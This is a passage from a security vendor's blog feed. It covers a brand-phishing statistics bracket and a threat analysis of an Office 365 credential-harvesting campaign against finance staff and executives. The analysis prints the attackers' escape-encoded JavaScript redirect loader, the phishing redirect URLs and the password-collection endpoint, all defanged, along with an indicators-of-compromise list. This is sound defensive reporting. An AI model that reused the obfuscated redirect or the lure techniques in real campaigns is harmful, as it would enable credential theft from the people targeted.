    <p>The bottom line is this: Attackers know how to deliver brand phishing campaigns with techniques that evade native email defenses, email authentication and sender reputation tools (i.e., DMARC, SPF and DKIM).</p><p>But – they’re not particularly clever or unique about whom they impersonate. As you can see from our March Hackness findings, <b>just 25 organizations were used in the majority (57%) of these phishing emails.</b></p><p>There are three main reasons brand phishing continues to reach many organizations’ inboxes, year after year:</p><ul><li><p><b>It’s easy</b> for attackers to establish <a href="https://www.cloudflare.com/learning/ssl/what-is-domain-spoofing/">new phishing domains</a> that exploit trusted infrastructure.</p></li><li><p><b>It’s fast</b> for attackers to set up DMARC, SPF and DKIM policies for new phishing domains to reach inboxes.</p></li><li><p><b>People trust</b> emails from known organizations, business partners and internal employee accounts – accounts that they won’t identify as compromised unless they have more advanced email security in place.</p></li></ul><p>You can learn more about what the common email authentication standards (SPF, DKIM and DMARC) can and cannot do when it comes to correctly verifying the origins of emails (and who they claim to be from), here.</p><p>But what does work better than email authentication for <a href="https://www.cloudflare.com/learning/email-security/how-to-prevent-phishing/">preventing these kinds of phishing attacks</a>? <b>Advanced detection techniques.</b></p><p>For example, Area 1’s preemptive technology uses massive-scale web crawling to reveal emergent campaign infrastructure. 
Our small pattern analytics also identify phishing attack infrastructure, patterns of attack formation and threats within datasets that help us spot cyber campaigns as they’re being built.</p><p>To <b>see which brand phishing emails are landing in your organization’s inbox</b> (whether it’s from one of the March Hackness ‘players,’ or one of the 800-plus other brands hackers spoof), request a <b>free Phishing Risk Assessment</b> <a href="https://www.cloudflare.com/lp/emailsecurity/"><b>here</b></a><b>.</b></p><p>And, in the meantime, we hope you all enjoy the last of 2022 March Madness. We know we at Area 1 will!</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <category><![CDATA[Spoofing]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <guid isPermaLink="false">7zeIWQjLftRpiY3wTtnxk</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[2022 March Hackness: The Return of the Phishing Bracket - What 56 Million Emails Reveal about the Most Impersonated Brands]]></title>
            <link>https://blog.cloudflare.com/2022-march-hackness-phishing-bracket/</link>
            <pubDate>Sat, 26 Mar 2022 15:44:00 GMT</pubDate>
            <description><![CDATA[ Learn who made the list of the top brands that attackers use in phishing lures. This bracket is based on an analysis of more than 56 million phishing emails blocked by Area 1’s solution in the preceding 12 months since Feb 2022.  ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in March 2022 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p><i>Area 1 Security’s </i><b><i>Sixth Annual March Hackness: The Perfect Phishing Bracket</i></b><i> is here!</i></p><p><i>Learn who made the list of the top brands that attackers use in phishing lures. This bracket is based on an analysis of more than 56 million phishing emails blocked by Area 1’s solution in the preceding 12 months since Feb 2022. Like with the real tournament, there are some surprising Cinderella-like newcomers, well-known MVPs, and 800-plus spoofed organizations in between — but overall, 77% of all phishing attacks exploited just the Top 64 brands in our bracket, below.</i></p><p>Well, it’s that time of the year when NCAA basketball fans find themselves bemoaning broken brackets** and pondering life’s biggest questions, such as:</p><ul><li><p>How did the Wildcat men and women both lose in the first rounds?</p></li><li><p>Was Baylor’s exit scientific proof that all good things really must come to an end?</p></li><li><p>DID ALL THAT JUST REALLY HAPPEN?!</p></li><li><p>What if the referees didn’t [insert your adjectives of choice here]?</p></li></ul><p>**A heartbroken RIP to my unsuccessful pick-to-win-it-all, Gonzaga. Goodbye, Bulldogs, we barely knew you.</p><p>Now, the Area 1 Security folks can only offer some unscientific opinions to the questions above. 
After all, our job is to prevent breaches, not prognosticate about bad <a href="https://www.sbnation.com/college-basketball/2022/3/19/22986648/north-carolina-vs-baylor-march-madness-refs-video-brady-manek-ejection">perfectly fine</a> officiating.</p><p>Which means that, unlike the “sometimes it’s just luck” nature of college basketball in March, we prefer to look at cold, hard data to answer threat trend questions.</p><p>And that brings us to — DRUM ROLL PLEASE — the introduction of our <b>Sixth Annual March Hackness: The Perfect Phishing Bracket!</b></p><p>This is the time of year we conclusively answer: <b>Which organizations do attackers impersonate most in phishing campaigns?</b></p><p>For 2022, our analysis is based on <b>more than 56 million phishing emails</b> that we intercepted from January 2021 – January 2022. And although attackers pretended to be <b>over 800 different organizations</b>, ultimately, just <b>64 organizations were the go-to lures in a whopping 77%</b> of these brand phishing attempts:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3r90T4rUd0iN28GKqtttps/323e8c273a16e2747df5bc1267b81b7d/image1-25.png" />
            
            </figure>
    <div>
      <h3>Breaking Down the Bracket</h3>
      <a href="#breaking-down-the-bracket">
        
      </a>
    </div>
    <p>Now, we’ll reveal soon who was MOST impersonated, but let’s break down our Top 64 (and other initial findings from the overall data), below.</p><p>As always, attackers continued to take advantage of the following two basic concepts when it comes to brand phishing campaigns (which, PS: easily evade DMARC and other email authentication standards):</p><p><b>1) Which technologies do people use most?</b> In Area 1’s first-ever March Hackness, we found hackers often exploited “traditional” banks and financial institutions, and loved to spoof the likes of AOL, Yahoo!, and Craigslist. But that was in 2016, when AOL’s AIM was still around (!!), before Facebook Marketplace launched as ‘the new’ Craigslist … and before something mysterious called Crypto.com rebranded the Staples Center.</p><p>Flash forward to today, and:</p><ul><li><p>In a sign of the times, and acknowledgement of how much <b>‘the Cloud’</b> is a part of all of our lives, <b>more than 22%</b> of brand phishing attacks exploited common <b>cloud services</b>, such as <b>Amazon, Box, DocuSign, Google, Intuit, Microsoft</b> and many others.</p></li><li><p>But, it isn’t just well-entrenched cloud companies on the list: <a href="https://www.theverge.com/2021/1/5/22215782/tiktok-notion-enterprise-software-teen-studyblr">viral-because-of-TikTok</a> <b>Notion.so,</b> the productivity tool that’s won over high schoolers and The Wall Street Journal, appeared for the first time in our Top 64!</p></li><li><p>Hackers are seeing dollar signs in cryptocurrency: <b>Binance</b> is a March Hackness newcomer (perhaps the Saint Peter’s of surprising suspect emails??!) this year. 
And although they didn’t crack the Top 64, <b>Coinbase</b>, <b>Metamask</b>, <b>Kraken</b>, <b>Gemini</b> and multiple crypto exchanges were also spoofed in thousands of phishing emails.</p></li><li><p>By the way, <b>Bitcoin</b>, which doesn’t technically qualify as an organization for our bracket, still deserves its own special shout-out: hackers referenced Bitcoin in <b>over 600,000</b> phishing emails last year. Actually, let’s just assume now that <a href="https://www.protocol.com/bulletins/circle-blockfi-pantera-hacked?">the crypto phishing trend</a> has only one direction to go.</p></li></ul><p><b>2) Which brands do people trust?</b> Attackers know users are more inclined to open and click messages from organizations that they interact with, whether it’s for information, work or play.</p><p>In addition to leveraging the <a href="https://www.cloudflare.com/products/zero-trust/remote-workforces/">hybrid/remote workforce</a> trend to phish users using popular cloud services, attackers also pretended to be:</p><ul><li><p><b>Healthcare &amp; Social Services:</b> With the Covid pandemic lingering on yet another year, the <b>World Health Organization</b> (last year’s “ophishal champion”) and Humana both reappear in the top 64. Area 1 also blocked thousands of phishing emails pretending to be from organizations like <b>UNICEF</b> and the <b>Centers for Medicare &amp; Medicaid Services</b> … proving that hackers are more than willing to exploit society’s most vulnerable.</p></li><li><p><b>Grocery Stores/Food &amp; Beverage Retailers:</b> Like <a href="https://www.supermarketnews.com/online-retail/online-channel-builds-share-us-grocery-market-2021">70% of U.S. households</a> last year, my family did a LOT of online grocery shopping. 
In fact, over half of all shoppers (51%) <a href="https://progressivegrocer.com/new-digital-grocery-shopper">started online grocery shopping</a> after the pandemic began — and our data shows bad actors have also been happy to jump onto this bandwagon shopping cart. Area 1 intercepted millions of phishing emails spoofing grocers of all sizes, across all regions: from <b>Fred Meyer</b> to <b>Amazon Fresh</b>, to <b>Kwik Shop</b> to <b>Costco</b>, and many, many more. [Insert bad pun about ordering ‘fish’, not ‘phish,’ here].</p></li></ul>
    <div>
      <h3>Who Will Cut Down the (Phishing) Nets?</h3>
      <a href="#who-will-cut-down-the-phishing-nets">
        
      </a>
    </div>
    <p>We’ll reveal the March Hackness champion — the No. 1 brand used for phishing (the organization used in a whopping <b>15% of the overall attacks</b>) — soon!</p><p>And, in the meantime, you might be wondering: “Why should I care? My organization has email authentication and other tools to block emails from fake senders!”</p><p>Well (unless you’re using Area 1), chances are good that brand phishing is still fouling up your organization’s inboxes.</p><p>Email authentication standards (i.e., SPF, DKIM and DMARC) can serve useful security functions such as validating server and tenant origins, protecting message integrity, and providing policy enforcement.</p><p>However, email authentication is <a href="https://gateway.on24.com/wcc/eh/2153307/lp/3955867/how-bad-actors-get-past-dmarc-in-60-minutes-or-less">largely ineffective</a> against brand phishing (especially when in the form of payload-less Business Email Compromise).</p><p>We’ll dive deeper into the reasons why, after we unveil the winner of the 2022 March Hackness: The Phishing Tournament. Stay tuned here.</p><p>PS: We can’t promise our findings will be less stressful than the NCAA championship game on April 4th. But, they should be more useful than wondering what “<a href="https://www.si.com/extra-mustard/2022/03/20/only-one-perfect-march-madness-bracket-remains">GO VOLS! GBO!</a>” is like in real life.</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <category><![CDATA[Spoofing]]></category>
            <guid isPermaLink="false">3FfQgyG9AErA8zhbOfAfse</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[Sophisticated Microsoft Spoof Targets Financial Departments]]></title>
            <link>https://blog.cloudflare.com/microsoft-365-spoof-targets-financial-departments/</link>
            <pubDate>Thu, 18 Mar 2021 15:35:00 GMT</pubDate>
            <description><![CDATA[ A sophisticated Microsoft Office 365 credential harvesting campaign targets financial departments at companies across multiple industries, as well as newly-appointed CEOs and executive assistants. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in March 2021 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p>
    <div>
      <h3>Highlights:</h3>
      <a href="#highlights">
        
      </a>
    </div>
    <ul><li><p><b><i>A large Microsoft 365 spoofing campaign evades Office 365’s native defenses and other email security defenses to target financial departments, C-suite executives and executive assistants across the financial services, insurance and retail industries.</i></b></p></li><li><p><b><i>Attackers even specifically targeted newly-selected CEOs during critical transitionary periods.</i></b></p></li><li><p><b><i>The credential harvesting campaigns utilized a variety of sophisticated techniques, including spoofing various Microsoft 365 service updates; using Microsoft-themed sender domains (to bypass email authentication); including PDF/HTM/HTML attachments; and leveraging advanced phishing kits.</i></b></p></li><li><p><b><i>Although Area 1 blocked these campaigns, had the campaigns been successful, the attackers could have, for example, gained access to sensitive data of third parties to send fraudulent invoices and launch additional Business Email Compromise attacks.</i></b></p></li></ul><p>Area 1 Security recently stopped a sophisticated Microsoft Office 365 credential harvesting campaign targeting C-suite executives, high-level assistants, and financial departments across numerous industries, including financial services, insurance, and retail. Further research and analysis of the activity revealed a much larger operation than originally discovered. This included several additional directly-related credential phishing campaigns that targeted the same industries and positions using sophisticated techniques and advanced phishing kits, to bypass Microsoft’s native email defenses and email authentication.</p><p>The campaigns, which began in early December and continued through February, targeted only select individuals at each company. 
Unlike the “spray and pray” method often seen with these types of cybercriminal-driven credential harvesting campaigns, this limited activity suggests a more targeted approach.</p><p>A large majority of the phishing attacks stopped by Area 1 Security were headed to financial controllers and treasurers at various international companies. By targeting the financial departments of these companies, the attackers could potentially gain access to sensitive data of third parties through invoices and billing, commonly referred to as a BEC (Business Email Compromise) attack. This enables the attackers to send forged invoices from legitimate email addresses to suppliers, resulting in payments being made to attacker-owned accounts.</p><p>Beyond financial departments, the attackers also targeted C-suite and executive assistants. Targeting high-level assistants is an often overlooked method of initial entry, despite these employees having access to highly sensitive information and an overall greater level of privileges.</p><p>In a few instances, the attackers even attempted to bait newly-selected CEOs of two major companies before any public announcements of this significant senior executive changeover were made.</p><p>By sending phishing messages during this critical transitionary period, the attackers likely hoped to catch the new CEOs off guard while they were focused on managing the new challenges that come with running a business.</p><p><b>What makes these phishing campaigns most noteworthy is the sophisticated methods employed by the threat actors at every step of the attack.</b></p><p>Clever tactics were used to not only craft the phishing messages, but also to send those messages, as well as to obtain passwords. 
These methods utilized a number of techniques at every step — including legitimate-looking domains and login pages, plus advanced phishing kits — to bypass email authentication and Microsoft’s email defenses.</p><p>It’s clear that the masterminds behind these attacks possess above-average skills compared to your typical credential harvesting schemers.</p>
    <div>
      <h3>A Not-So-Secure “Office 365 Update”</h3>
      <a href="#a-not-so-secure-office-365-update">
        
      </a>
    </div>
    <p>The first credential harvesting campaign, which initially bypassed Microsoft’s defenses and other email security layers before being discovered by Area 1 Security, involved emails containing purported instructions for applying an Office 365 security update, as detailed in Figure 1.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/jOAKssOYB019bNyPCkVwF/964bd2f53a94482c2a6288992ee3d4d6/image3.png" />
            
            </figure><p>Figure 1. Phishing Message with Office 365 Brand Spoof</p><p>The bulk of the phishing messages had the Subject, “Important Service Changes”, and contained a number of sender display names that ranged from generic “no-reply” addresses to company-specific names.</p><p>However, other Subject lines, as observed in the additional related campaigns, included “PDF New Policy”, “PDF Service” and “Voice Message Received from Unidentified CallerID”. These related campaigns tailored the messages by also including the targeted company’s name in the Subject line.</p><p>To add legitimacy to the messages, <b>an overwhelming majority of the observed phishing emails were sent from addresses with Microsoft-themed sender domains,</b> such as microsoftoutlookwebservices[.]online and outlookonlinewebservices-com[.]online. The attackers also properly configured the SPF records for these domains to better ensure their messages passed email authentication.</p><p>In an effort to further avoid detection, the threat actors leveraged their Microsoft-imposter domains in the phishing attacks not long after they were registered.</p><p>This quick domain registration turnaround is a common tactic employed by scammers hoping to bait as many victims as possible before their newly registered domains are identified as phishing infrastructure.</p><p>In some cases, the attackers even compromised benign email accounts and used them to send the phishing messages in an attempt to stifle attribution to known actor-controlled phishing infrastructure. They also spoofed email addresses of poorly-configured legitimate sender domains, exploiting inherent weaknesses in email authentication protocols to allow them to easily evade phishing protection solutions.</p><p>Using Microsoft-themed update lures, the attackers appeared to take advantage of the general lack of security awareness that plagues most companies. 
Microsoft does not proactively send security alerts and updates of this nature via email to end-users, which should be the first sign of foul play. At most, a monthly security notification is sent to network administrators detailing recent Common Vulnerabilities and Exposures (CVEs).</p><p><b>However, because knowledge of an enterprise’s security update process is mostly unknown beyond the IT department, a significant number of employees could easily fall for this phish.</b></p><p>Ironically, fraudsters are constantly profiting off of angst surrounding ongoing cybersecurity scares, like the now-infamous SolarWinds breach, and they know that targets are likely to click out of fear that their noncompliance could be the source of another breach.</p>
    <div>
      <h3>See Attachment to “Apply Update”</h3>
      <a href="#see-attachment-to-apply-update">
        
      </a>
    </div>
    <p>The phishing messages contained just enough details to lure unsuspecting targets into opening the attachment, which was either a PDF, HTML, or HTM file. Depicted in Figure 2 is an example of the PDF attachment, which contains redacted target information, including full name, email address, and company logo.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3JgxiQ66ExhQtALjw2zFwp/5e4f5addb53a0a063a715c270d4415aa/image5.png" />
            
            </figure><p>Figure 2. Example PDF Attachment with Link to Office 365 Credential Harvester</p><p>A majority of the targeted email accounts followed the format @, making the inclusion of full names in the attachments fairly effortless from an automated standpoint. However, even in cases where only initials appeared in the email address, the attackers still managed to include the target’s full name in the PDF attachment. This indicates that the threat actors conducted additional reconnaissance to carefully craft their phishing lures.</p><p>To fulfill the attacker’s request and “install” the feigned security update, the target would need to click on the “Apply Update” button, where they would be taken to one of several spoofed Office 365 login pages. This additional step for loading the credential harvesting site was only required if the target received a PDF attachment.</p><p>For both the HTML and HTM attachments, the credential harvesting site would automatically load in the victim’s browser once the file was opened. As shown in Figure 3, the attackers tried to avoid detection by using the JavaScript escape function to encode the HTML that loads the malicious web page.</p>
            <pre><code>&lt;!DOCTYPE html&gt;
&lt;html dir="ltr" xmlns="http://www.w3.org/1999/xhtml"&gt;
&lt;head&gt;
&lt;script language="javascript"&gt;document.write(unescape('%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%31%3B%68%74%74%70%73%3A%2F%2F%6C%6F%67%69%6E%2E%6D%69%63%72%6F%73%6F%66%74%6F%66%66%69%63%65%6F%6E%6C%69%6E%65%73%65%72%76%69%63%65%73%2E%63%6F%6D%3F%65%3D'));&lt;/script&gt;
&lt;script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"&gt;&lt;/script&gt;
&lt;title&gt;Outlook&lt;/title&gt;</code></pre>
            <p>Once the code is unescaped, as detailed in Figure 4, you can see how the attackers used HTML “meta” refresh to direct the victim’s browser to load the credential harvesting site.</p>
            <pre><code>&lt;meta http-equiv="refresh" content="1;hxxps://login.microsoftofficeonlineservices[.]com?e=&lt;base64 encoded target email&gt;"&gt;</code></pre>
            <p><b>This functionality is one small part of a fairly advanced phishing kit that enabled the attackers to, at least initially, sneak past Microsoft’s Office 365 native defenses, and several other email security solutions, before being identified and stopped by Area 1 Security.</b></p>
    <div>
      <h3>Stealthy Office 365 Phishing Websites and Phishing Kits</h3>
      <a href="#stealthy-office-365-phishing-websites-and-phishing-kits">
        
      </a>
    </div>
    <p>Once the target opens the HTML or HTM attachment, or clicks the “Apply Update” button, their browser will follow a series of HTTP redirects and client-side redirects via JavaScript or Meta fields. For example, one of the many links in the phishing messages that Area 1 Security observed included:</p><p><code>hxxps://simpus3.bandungkab.go[.]id/?username=&lt;base64 encoded target email address&gt;</code></p><p>If clicked, the target’s browser would then redirect to the URL:</p>
            <pre><code>hxxps://microsoftofficeonlineservices[.]outlookprivacypolicy[.]online/common/?client_id=4345a7b9-9a63-4910-a426-35363201d503&amp;response_mode=form_post&amp;response_type=code+id_token&amp;scope=openid+profile&amp;state=OpenIdConnect.AuthenticationProperties%3dKZeFMEdbUJBGtfhET_m7HpFINC_qWyaoYc_JS_C5znhJs0YOuquvhkEmzMzK3Ntri00CKVrHEJkyja-3DIXEvtgEaRE5mZ-jAKkVOhjSG4ud7eS1OSBeHlkBsB4tQsqP&amp;nonce=637037128007965152.ODZmZWY4MGMtYzYwNC00M2NjLThmZWEtYmE4OTJiNmI1MWE2OWQwYWVkZWQtMjE2My00ZDcyLWEwN2UtN2M3ODA3OGZiNWY3&amp;redirect_uri=https%3a%2f%2fwww[.]office[.]com%2f&amp;ui_locales=en-US&amp;mkt=en-US&amp;client-request-id=c36fe010-0bb6-4e01-94f8-a8683b752a6d</code></pre>
            <p>As shown in Figure 5, this URL links to the landing page for the credential harvester, which displays a very convincing Microsoft-themed “privacy policy” statement.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/8K5iLRFvh8WAB2CICz3qU/a1f1ceb9dd47b79402ef48f6b1204298/image2.png" />
            
            </figure><p>Figure 5. Fake Microsoft Privacy Policy Statement</p><p>In the upper-right corner of the page is a uniquely photoshopped image of the Microsoft logo. Area 1 Security researchers overlaid this image on a black background, as depicted below, to highlight where the attackers edited the original logo.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5tHCAQNHzvM3r8BQdV4CIo/0219d511eff3566ed8412c1687106c58/image6.png" />
            
            </figure><p>Figure 6. Photoshopped Microsoft Logo</p><p>If the target clicks the “Accept” button on the privacy policy statement, they are further redirected to a fake Office 365 login page:</p>
            <pre><code>hxxps://microsoftofficeonlineservices[.]outlookprivacypolicy[.]online/common/oauth2-authorize/#client_id=4345a7b9-9a63-4910-a426-35363201d503&amp;response_mode=form_post&amp;response_type=code+id_token&amp;scope=openid+profile&amp;state=OpenIdConnect.AuthenticationProperties%3dKZeFMEdbUJBGtfhET_m7HpFINC_qWyaoYc_JS_C5znhJs0YOuquvhkEmzMzK3Ntri00CKVrHEJkyja-3DIXEvtgEaRE5mZ-jAKkVOhjSG4ud7eS1OSBeHlkBsB4tQsqP&amp;nonce=637037128007965152.ODZmZWY4MGMtYzYwNC00M2NjLThmZWEtYmE4OTJiNmI1MWE2OWQwYWVkZWQtMjE2My00ZDcyLWEwN2UtN2M3ODA3OGZiNWY3&amp;redirect_uri=https%3a%2f%2fwww[.]office[.]com%2f&amp;ui_locales=en-US&amp;mkt=en-US&amp;client-request-id=c36fe010-0bb6-4e01-94f8-a8683b752a6d </code></pre>
            <p>The page looks identical to the legitimate login, and to appear all the more convincing, the logo associated with the domain of the targeted company is dynamically loaded. More specifically, the domain appearing in the target’s email address is used to grab the company logo from the site logo.clearbit.com (i.e., <a href="http://logo.clearbit.com/">http://logo.clearbit.com/</a>). For demonstration purposes, the fake email “admin@google[.]com” was used to illustrate how the phishing kit displays the Google logo based on the “google.com” domain found in the “victim” email address.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3MF7RCbLHHEjt8MMRmmUDu/325611c1fe4c88a717ae61fd6cbe0bfa/image1.png" />
            
            </figure><p>Figure 7. Fake Office 365 Login</p><p>In some cases, the attackers were even more stealthy by prefetching the localized Office 365 sign-in:</p><ul><li><p>If the victim entered their email address, the attacker would verify it was a valid Office 365 address.</p></li><li><p>In instances where the entered email address used Conditional Access, a different single sign-on (SSO), Active Directory Federation Services (ADFS), etc., the phishing kit would essentially break, and the victim would simply be redirected to the legitimate sign-in experience.</p></li></ul><p>If the victim entered their password, it would be sent to the attacker as form data via an HTTP POST request to:</p><p><code>hxxps://microsoftofficeonlineservices[.]outlookprivacypolicy[.]online/common/oauth2-authorize/index[.]php</code></p><p>At this point, the attacker could gain full access to the victim’s email account, and possibly other systems or services if the victim reused their password.</p><p>A closer look at the source code for the credential harvesting sites revealed that the threat actors used free-use licenses for front-end web development to assist in creating an <a href="https://www.bankinfosecurity.com/demand-for-phishing-kits-strong-report-a-14140">advanced phishing kit</a> to clone the Microsoft login page.</p><p>For some observed campaigns, the phishing kit created different subdomains based on the email address hardcoded in the URL. 
Altering the email address would break the link and cause a redirect to either a spoofed Microsoft Service Agreement page, the Google homepage, or simply a blank page.</p><p><b>Unlike your typical run-of-the-mill credential harvesters where any email address can be entered as a URL parameter without affecting its functionality, this activity implies the threat actors were interested in a specific predetermined target list.</b></p><p>Another major difference in this phishing campaign compared to typical credential harvesters — and basic phishing kits for that matter — was the use of websockets to send screenshots back to the attackers on each click, in particular when a victim clicked the “Next” button after entering their email address and password.</p><p>Figure 8 highlights how JavaScript is used to execute the screenshot functionality and encode the resulting image in Base64.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3QasyVUljSXHkysqwYTbWb/96ad9bff6fdfc2b835e8f98b197eead9/image4.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Ex00Kgpx4HvMJlfLV5WP6/8b9ea87ac65e060daa82040344418b7f/image7.png" />
            
            </figure><p>Figure 8. Evidence of Phishing Kit Base64-Encoding Screenshots</p><p>It’s evident that the various campaigns observed by Area 1 Security leveraged an advanced phishing kit that used a variety of techniques as noted above, as well as a diverse set of phishing infrastructure.</p><p><b>At least nine different domains were used to host the credential harvesters. Four of these domains had Microsoft-themed names and appeared to be controlled by the attackers:</b></p><ul><li><p>microsoftofficeonlineservices[.]com</p></li><li><p>outlookprivacypolicy[.]online</p></li><li><p>office-policy-center[.]com</p></li><li><p>ms365[.]us</p></li></ul><p>Not surprisingly, the remaining domains were legitimate websites compromised by the attackers and co-opted for use in their phishing operations. There are a range of benefits for attackers in choosing benign sites to host malicious content, not the least of which includes the site’s positive reputation. It also reduces the attacker’s need to purchase infrastructure that could more easily be traced back to them.</p><p>Despite the fact that these credential harvesters spoofed a Microsoft login page, many of the sites remained active for a considerable time before being flagged as malicious and taken down. This game of “whack-a-mole” was hardly enough to deter these fraudsters. With each takedown, new phishing infrastructure quickly surfaced.</p>
    <div>
      <h3>How to Stop Credential Harvesters</h3>
      <a href="#how-to-stop-credential-harvesters">
        
      </a>
    </div>
    <p>With threat actors well-equipped for stealing employee credentials, it is vital that companies prepare adequate defenses to protect users from falling victim to these login-themed attacks. As attackers continuously invent new ways to bypass defenses, including the use of advanced phishing kits, security practitioners need to turn to solutions on the cutting edge of <a href="https://www.cloudflare.com/zero-trust/solutions/email-security-services/">email security technology</a> in order to block these highly-damaging phishing campaigns.</p><p>New tactics and methods may be able to trick legacy vendors and cloud email providers such as Microsoft, but Area 1 Security’s <a href="https://www.cloudflare.com/zero-trust/products/email-security/">cloud-native email security solution</a> stops these attackers dead in their tracks. Our advanced Machine Learning and Artificial Intelligence technologies allow our algorithms to uncover new tactics used by malicious actors to bypass defenses in real time (on average 24 days before industry benchmarks), versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time, so that users are never exposed to the attack.</p>
    <div>
      <h3>Indicators of Compromise</h3>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
    <p><b>Phishing Email Subject Lines:</b></p><p>Important Service Changes</p><p>PDF New Policy</p><p>PDF Service</p><p>Voice Message Received from Unidentified CallerID - </p><p><b>Sender Display Names:</b></p><p>TOS</p><p>Outlook</p><p>Notice</p><p>Policy</p><p>Voicemail</p><p>Voicemail Box</p><p>No Reply</p><p>No-reply</p><p>noreply</p><p><b>Sender Addresses:</b></p><p>audio-center@voicemail[.]microsoftoutlookwebservices[.]online</p><p>audio@voicebox[.]microsoftoutlookwebservices[.]online</p><p>mail-service@microsoftoutlookwebservices[.]online</p><p>mailman@microsoftoutlookwebservices[.]online</p><p>messages@voicebox[.]microsoftoutlookwebservices[.]online</p><p>no-reply@voicemailbox[.]microsoftoutlookwebservices[.]online</p><p>noreply@tos[.]microsoftoutlookwebservices[.]online</p><p>postfix@relay-server[.]microsoftoutlookwebservices[.]online</p><p>terms@tos[.]microsoftoutlookwebservices[.]online</p><p>voicemail@message-center[.]microsoftoutlookwebservices[.]online</p><p>voicemail@microsoftoutlookwebservices[.]online</p><p>no-reply@outlookonlinewebservices-com[.]online</p><p>noreply@outlookonlinewebservices-com[.]online</p><p>o365@outlookonlinewebservices-com[.]online</p><p>service@outlookonlinewebservices-com[.]online</p><p>msa@microsoft-message-center[.]outlookonlinewebservices-com[.]online</p><p>no-reply@microsoft-message-center[.]outlookonlinewebservices-com[.]online</p><p>noreply@microsoft-message-center[.]outlookonlinewebservices-com[.]online</p><p>o365@microsoft-message-center[.]outlookonlinewebservices-com[.]online</p><p>service@microsoft-message-center[.]outlookonlinewebservices-com[.]online</p><p>message-center@microsoftofficeonlinemessagecenter-com[.]ru</p><p>msa@microsoftofficeonlinemessagecenter-com[.]ru</p><p>no-reply@microsoftofficeonlinemessagecenter-com[.]ru</p><p>noreply@microsoftofficeonlinemessagecenter-com[.]ru</p><p>policy@microsoftofficeonlinemessagecenter-com[.]ru</p><p>o365@message-center[.]microsoftofficeonlinemessagecenter-com[.]ru</p><p>policy@message-center[.]microsoftofficeonlinemessagecenter-com[.]ru</p><p>no-reply@office[.]microsoftofficeonlinemessagecenter[.]com[.]ru</p><p>office@service[.]microsoftofficeonlinemessagecenter[.]com[.]ru</p><p>do-not-reply@delayed[.]entrepreserves[.]com</p><p>enitity@express[.]entrepreserves[.]com</p><p>nooze@ghosted[.]entrepreserves[.]com</p><p>no-reply@unnnetworked[.]sollutiance[.]com</p><p>no-reply@mynetwork[.]unnetflow[.]com</p><p><b>Actor-Controlled Credential Harvesting Sites:</b></p><p>microsoftofficeonlineservices[.]com</p><p>outlookprivacypolicy[.]online</p><p>office-policy-center[.]com</p><p>ms365[.]us</p><p><b>Actor-Compromised Credential Harvesting Sites:</b></p><p>al-abdal[.]net</p><p>goatourspackage[.]com</p><p>perpustakaanarda[.]papua[.]go[.]id</p><p>satoshiation[.]com</p><p>simpus3[.]bandungkab[.]go[.]id</p><p>theeditorngr[.]com</p><p><b>Links Identified in Phishing Emails:</b></p><p>hxxps://www[.]microsoftofficeonlineservices[.]com/b/service/?username=[target email address]</p><p>hxxps://login[.]microsoftofficeonlineservices[.]com?e=[base64 encoded email]</p><p>hxxps://login[.]microsoftonlineservices[.]office-policy-center[.]com/?e=[base64 encoded target email address]</p><p>hxxp://ms365[.]us/account-login?e=[base64 encoded target email address]</p><p>hxxps://goatourspackage[.]com/?e=[base64 encoded email]</p><p>hxxps://simpus3[.]bandungkab[.]go[.]id/?username=[base64 encoded email]</p><p>hxxps://al-abdal[.]net/outlook/test/?e=[base64 encoded email]</p><p>hxxps://satoshiation[.]com/?e=[base64 encoded email]</p><p>hxxps://theeditorngr[.]com/@?username=[base64 encoded target email address]</p><p>hxxps://perpustakaanarda[.]papua[.]go[.]id?e=[target email address]</p><p><b>Malicious File Names:</b></p><p>_TOS-Updated_v&lt;8-digit number&gt;.pdf</p><p>PDF Policy_v&lt;8-digit number&gt;.pdf</p><p>_VoiceMessage&lt;8-digit number&gt;.html</p><p>Microsoft-Policy-Updated.pdf</p><p>PolicyUpdate.htm</p><p><b>Modified Microsoft Logo Hashes:</b></p><p>MD5: 900b8133ac181eedbbd698ee2a2fabbc</p><p>SHA1: 1106889AAA1BAFF9F00904BE335F5A373EE7C059</p><p>SHA256: 29256ABAEC0B1325152FC8ADDA5EF62E3BCAE45860A004221EC027321436FEBF</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <guid isPermaLink="false">4qv9XqIEdFFFM0ILdGmXag</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
